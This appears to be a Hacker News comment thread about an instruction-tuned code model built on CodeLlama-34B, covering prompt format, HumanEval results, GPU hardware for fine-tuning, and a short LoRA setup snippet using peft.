Maybe worth noting that, depending on specifics, a 3090 isn't necessarily a strict upgrade over an M1 Max. While a 3090 will be faster on any model it can run, an M1 with 32GB of RAM or more can load models which a 3090 cannot.


I tried using Alibaba Cloud servers to train my model, but it seems very expensive.


Could you please add the prompt format to the model card, or at least here?


The model card is intended to help reproduce the HumanEval results, which we've achieved with no prompt.

However, the model is instruction-tuned to follow completions (not chats). Simply tell it what you want and it should work.


Yeah, but I assume it has a prompt format; for example, for CodeLlama-34B Instruct the prompt format is

[INST] Write a function in Python that prints HelloWorld [/INST]


Nope, just ask your question. It's not chat-tuned the same way as CodeLlama34B Instruct.


Interesting. That seems a pretty odd choice. Without a prompt format (like almost all instruction finetunes have) the model might continue your instruction instead of answering the instruction, since it does not have a delimiter for where the instruction ends and the response begins.


This is an early experiment that we did in just a few hours. We'll have much better models in just a few days, stay tuned :)


What would the hardware requirements be for fine-tuning a Llama 2?


We didn't want to use LoRA to maximize quality, so we used 32 A100-80GB with a sequence length of 4096. It's possible to do a native fine-tune on as little as 8 A100-80GB with DeepSpeed Zero 3, but it will take longer.

With LoRA you can probably get away with just a few 4090s.
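If someone wants to try the LoRA route, a minimal peft sketch looks roughly like this (hyperparameters are illustrative only, and to be clear this is not what we did for this model):

    from transformers import AutoModelForCausalLM
    from peft import LoraConfig, get_peft_model

    model = AutoModelForCausalLM.from_pretrained(
        "codellama/CodeLlama-34b-hf", load_in_4bit=True, device_map="auto")
    lora = LoraConfig(r=16, lora_alpha=32, lora_dropout=0.05,
                      target_modules=["q_proj", "k_proj", "v_proj", "o_proj"],
                      task_type="CAUSAL_LM")
    model = get_peft_model(model, lora)
    model.print_trainable_parameters()  # only a tiny fraction of the 34B params train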


Is the dataset open source?


> proprietary dataset

This reads more like advertising copy than an HN article.


Can you suggest better terminology? It seems normal to me.



